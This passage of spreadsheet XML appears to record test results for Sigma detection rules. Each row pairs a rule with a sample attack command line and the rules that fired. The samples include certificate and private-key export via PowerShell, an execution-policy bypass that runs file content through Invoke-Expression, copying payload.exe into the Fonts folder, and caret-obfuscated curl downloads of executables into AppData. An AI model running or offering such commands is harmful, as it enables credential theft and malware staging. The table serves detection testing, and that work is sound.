      <c r="G4026" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4026" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4026" s="43" t="inlineStr">
        <is>
          <t>Weak or Abused Passwords In CLI (91edcfb1-2529-4ac2-9ecc-7617f895c7e4); Weak or Abused Passwords In CLI (91edcfb1-2529-4ac2-9ecc-7617f895c7e4)</t>
        </is>
      </c>
      <c r="J4026" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K4026" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4027" ht="15.75" customHeight="1" s="42">
      <c r="A4027" s="43" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B4027" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C4027" s="43" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D4027" s="43" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E4027" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; Export-PfxCertificate -Cert Cert:\LocalMachine\My\ABCDEF1234567890 -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F4027" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4027" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4027" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4027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4027" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K4027" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4028" ht="15.75" customHeight="1" s="42">
      <c r="A4028" s="43" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B4028" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C4028" s="43" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D4028" s="43" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E4028" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-ChildItem -Path Cert:\CurrentUser\My | Export-PfxCertificate -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F4028" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4028" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4028" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4028" s="43" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell (9e716b33-63b2-46da-86a4-bd3c3b9b5dfb); Certificate Exported Via PowerShell (9e716b33-63b2-46da-86a4-bd3c3b9b5dfb); Private Keys Reconnaissance Via CommandLine Tools (213d6a77-3d55-4ce8-ba74-fcfef741974e)</t>
        </is>
      </c>
      <c r="J4028" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K4028" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4029" ht="15.75" customHeight="1" s="42">
      <c r="A4029" s="43" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B4029" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C4029" s="43" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D4029" s="43" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E4029" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-Alias epfx Export-PfxCertificate; epfx -Cert Cert:\LocalMachine\My\ABCDEF1234567890 -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F4029" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4029" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4029" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4029" s="43" t="inlineStr">
        <is>
          <t>Weak or Abused Passwords In CLI (91edcfb1-2529-4ac2-9ecc-7617f895c7e4); Weak or Abused Passwords In CLI (91edcfb1-2529-4ac2-9ecc-7617f895c7e4)</t>
        </is>
      </c>
      <c r="J4029" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K4029" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4030" ht="15.75" customHeight="1" s="42">
      <c r="A4030" s="43" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B4030" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C4030" s="43" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D4030" s="43" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E4030" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Export-Certificate -Cert Cert:\LocalMachine\My\ABCDEF1234567890 -FilePath C:\temp\cert.cer"</t>
        </is>
      </c>
      <c r="F4030" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4030" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4030" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4030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4030" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K4030" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4031" ht="15.75" customHeight="1" s="42">
      <c r="A4031" s="43" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B4031" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C4031" s="43" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D4031" s="43" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E4031" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Export-Certificate -Type CERT -Cert Cert:\LocalMachine\My\ABCDEF1234567890 -FilePath C:\temp\cert.cer"</t>
        </is>
      </c>
      <c r="F4031" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4031" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4031" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4031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4031" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K4031" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4032" ht="15.75" customHeight="1" s="42">
      <c r="A4032" s="43" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B4032" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C4032" s="43" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D4032" s="43" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E4032" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Export-PfxCertificate -Cert Cert:\LocalMachine\My\ABCDEF1234567890 -FilePath C:\temp\cert.pfx -Password (ConvertTo-SecureString -String 'P@ssw0rd' -AsPlainText -Force)"</t>
        </is>
      </c>
      <c r="F4032" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4032" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4032" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4032" s="43" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine (74403157-20f5-415d-89a7-c505779585cf); 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4032" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K4032" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4033" ht="15.75" customHeight="1" s="42">
      <c r="A4033" s="43" t="inlineStr">
        <is>
          <t>t1204</t>
        </is>
      </c>
      <c r="B4033" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent</t>
        </is>
      </c>
      <c r="C4033" s="43" t="inlineStr">
        <is>
          <t>Arbitrary Shell Command Execution Via Settingcontent-Ms</t>
        </is>
      </c>
      <c r="D4033" s="43" t="inlineStr">
        <is>
          <t>24de4f3b-804c-4165-b442-5a06a2302c7e</t>
        </is>
      </c>
      <c r="E4033" s="43" t="inlineStr">
        <is>
          <t>powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "$p = 'C:\path\to\payload.settingcontent-ms'; $c = Get-Content $p -Raw; Invoke-Expression ($c.ToString().Replace('.SettingContent-ms', ''))"</t>
        </is>
      </c>
      <c r="F4033" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4033" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4033" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4033" s="43" t="inlineStr">
        <is>
          <t>Powershell Inline Execution From A File (ee218c12-627a-4d27-9e30-d6fb2fe22ed2); Powershell Inline Execution From A File (ee218c12-627a-4d27-9e30-d6fb2fe22ed2); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180); Arbitrary Shell Command Execution Via Settingcontent-Ms (24de4f3b-804c-4165-b442-5a06a2302c7e); Arbitrary Shell Command Execution Via Settingcontent-Ms (24de4f3b-804c-4165-b442-5a06a2302c7e)</t>
        </is>
      </c>
      <c r="J4033" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K4033" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4034" ht="15.75" customHeight="1" s="42">
      <c r="A4034" s="43" t="inlineStr">
        <is>
          <t>t1211</t>
        </is>
      </c>
      <c r="B4034" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C4034" s="43" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D4034" s="43" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E4034" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c 'Copy-Item -Path payload.exe -Destination C:\Windows\Fonts\'</t>
        </is>
      </c>
      <c r="F4034" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4034" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4034" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4034" s="43" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder (ae9b0bd7-8888-4606-b444-0ed7410cb728); Writing Of Malicious Files To The Fonts Folder (ae9b0bd7-8888-4606-b444-0ed7410cb728)</t>
        </is>
      </c>
      <c r="J4034" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K4034" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4035" ht="15.75" customHeight="1" s="42">
      <c r="A4035" s="43" t="inlineStr">
        <is>
          <t>t1211</t>
        </is>
      </c>
      <c r="B4035" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C4035" s="43" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D4035" s="43" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E4035" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command Copy-Item -Path payload.exe -Destination C:\Windows\Fonts\</t>
        </is>
      </c>
      <c r="F4035" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4035" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4035" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4035" s="43" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder (ae9b0bd7-8888-4606-b444-0ed7410cb728); Writing Of Malicious Files To The Fonts Folder (ae9b0bd7-8888-4606-b444-0ed7410cb728)</t>
        </is>
      </c>
      <c r="J4035" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K4035" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4036" ht="15.75" customHeight="1" s="42">
      <c r="A4036" s="43" t="inlineStr">
        <is>
          <t>t1211</t>
        </is>
      </c>
      <c r="B4036" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C4036" s="43" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D4036" s="43" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E4036" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Copy-Item -Path payload.exe -Destination 'C:\Windows\Fonts\'"</t>
        </is>
      </c>
      <c r="F4036" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4036" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4036" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4036" s="43" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder (ae9b0bd7-8888-4606-b444-0ed7410cb728); Writing Of Malicious Files To The Fonts Folder (ae9b0bd7-8888-4606-b444-0ed7410cb728)</t>
        </is>
      </c>
      <c r="J4036" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K4036" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4037" ht="15.75" customHeight="1" s="42">
      <c r="A4037" s="43" t="inlineStr">
        <is>
          <t>t1211</t>
        </is>
      </c>
      <c r="B4037" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C4037" s="43" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D4037" s="43" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E4037" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command {Copy-Item -Path payload.exe -Destination C:\Windows\Fonts\}</t>
        </is>
      </c>
      <c r="F4037" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4037" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4037" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4037" s="43" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder (ae9b0bd7-8888-4606-b444-0ed7410cb728); Writing Of Malicious Files To The Fonts Folder (ae9b0bd7-8888-4606-b444-0ed7410cb728)</t>
        </is>
      </c>
      <c r="J4037" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K4037" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4038" ht="15.75" customHeight="1" s="42">
      <c r="A4038" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4038" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C4038" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D4038" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E4038" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "curl -o %A^ppData%\test.exe h^t^t^p://[example.com/test.exe]()"</t>
        </is>
      </c>
      <c r="F4038" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4038" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4038" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4038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4038" s="43" t="n"/>
      <c r="K4038" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4039" ht="15.75" customHeight="1" s="42">
      <c r="A4039" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4039" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C4039" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D4039" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E4039" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /C "curl -o %A^ppData%\test.exe h^t^t^p://[example.com/test.exe]()"</t>
        </is>
      </c>
      <c r="F4039" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4039" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4039" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4039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4039" s="43" t="n"/>
      <c r="K4039" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4040" ht="15.75" customHeight="1" s="42">
      <c r="A4040" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4040" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C4040" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D4040" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E4040" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "curl h^tt^ps://example.com/file.exe -o %AP^PDATA%\file.exe"</t>
        </is>
      </c>
      <c r="F4040" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4040" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4040" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4040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0" s="43" t="n"/>
      <c r="K4040" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4041" ht="15.75" customHeight="1" s="42">
      <c r="A4041" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4041" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C4041" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D4041" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E4041" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /C "curl h^tt^ps://example.com/file.exe -o %AP^PDATA%\file.exe"</t>
        </is>
      </c>
      <c r="F4041" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4041" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4041" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4041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1" s="43" t="n"/>
      <c r="K4041" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4042" ht="15.75" customHeight="1" s="42">
      <c r="A4042" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4042" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C4042" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D4042" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E4042" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "set protocol=http&amp;&amp; set url=://example.com/file.exe&amp;&amp; set dest=%USERPROFILE%\AppData\Roaming\file.exe&amp;&amp; call curl %protocol%%url% -o %dest%"</t>
        </is>
      </c>
      <c r="F4042" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4042" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4042" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4042" s="43" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination (21dd6d38-2b18-4453-9404-a0fe4a0cc288); Suspicious Curl.EXE Download (e218595b-bbe7-4ee5-8a96-f32a24ad3468); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J4042" s="43" t="n"/>
      <c r="K4042" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4043" ht="15.75" customHeight="1" s="42">
      <c r="A4043" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4043" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C4043" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D4043" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E4043" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /C "set protocol=http&amp;&amp; set url=://example.com/file.exe&amp;&amp; set dest=%USERPROFILE%\AppData\Roaming\file.exe&amp;&amp; call curl %protocol%%url% -o %dest%"</t>
        </is>
      </c>
      <c r="F4043" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4043" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4043" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4043" s="43" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination (21dd6d38-2b18-4453-9404-a0fe4a0cc288); Suspicious Curl.EXE Download (e218595b-bbe7-4ee5-8a96-f32a24ad3468); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J4043" s="43" t="n"/>
      <c r="K4043" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4044" ht="15.75" customHeight="1" s="42">
      <c r="A4044" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4044" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C4044" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D4044" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E4044" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "curl h^t^t^p^s^:^/^/[example.com/payload.exe]() -o %AppData%\payload.exe"</t>
        </is>
      </c>
      <c r="F4044" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4044" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4044" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4044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4044" s="43" t="n"/>
      <c r="K4044" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4045" ht="15.75" customHeight="1" s="42">
      <c r="A4045" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4045" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C4045" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D4045" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E4045" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /C "curl h^t^t^p^s^:^/^/[example.com/payload.exe]() -o %AppData%\payload.exe"</t>
        </is>
      </c>
      <c r="F4045" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4045" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4045" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4045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4045" s="43" t="n"/>
      <c r="K4045" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4046" ht="15.75" customHeight="1" s="42">
      <c r="A4046" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4046" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C4046" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D4046" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E4046" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "curl http://example.com/payload.exe -o %USERPROFILE%\AppData\Roaming\payload.exe"</t>
        </is>
      </c>
      <c r="F4046" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4046" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4046" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4046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6" s="43" t="n"/>
      <c r="K4046" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4047" ht="15.75" customHeight="1" s="42">
      <c r="A4047" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4047" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C4047" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D4047" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E4047" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /C "curl http://example.com/payload.exe -o %USERPROFILE%\AppData\Roaming\payload.exe"</t>
        </is>
      </c>
      <c r="F4047" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4047" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4047" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4047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7" s="43" t="n"/>
      <c r="K4047" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4048" ht="15.75" customHeight="1" s="42">
      <c r="A4048" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4048" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C4048" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D4048" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E4048" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "curl http://example.local/test.txt -o C:\Users\Public\AppData\Roaming\test.txt"</t>
        </is>
      </c>
      <c r="F4048" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4048" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4048" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4048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8" s="43" t="n"/>
      <c r="K4048" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4049" ht="15.75" customHeight="1" s="42">
      <c r="A4049" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4049" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C4049" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D4049" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E4049" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /C "curl http://example.local/test.txt -o C:\Users\Public\AppData\Roaming\test.txt"</t>
        </is>
      </c>
      <c r="F4049" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4049" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4049" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4049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49" s="43" t="n"/>
      <c r="K4049" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4050" ht="15.75" customHeight="1" s="42">
      <c r="A4050" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4050" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C4050" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D4050" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E4050" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "set A=App&amp;&amp; set D=Data&amp;&amp; cmd /c curl h^ttp://example.local/test.txt -o %USERPROFILE%\%A%%D%\Roaming\test.txt"</t>
        </is>
      </c>
      <c r="F4050" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4050" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4050" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4050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4050" s="43" t="n"/>
      <c r="K4050" s="43" t="b">
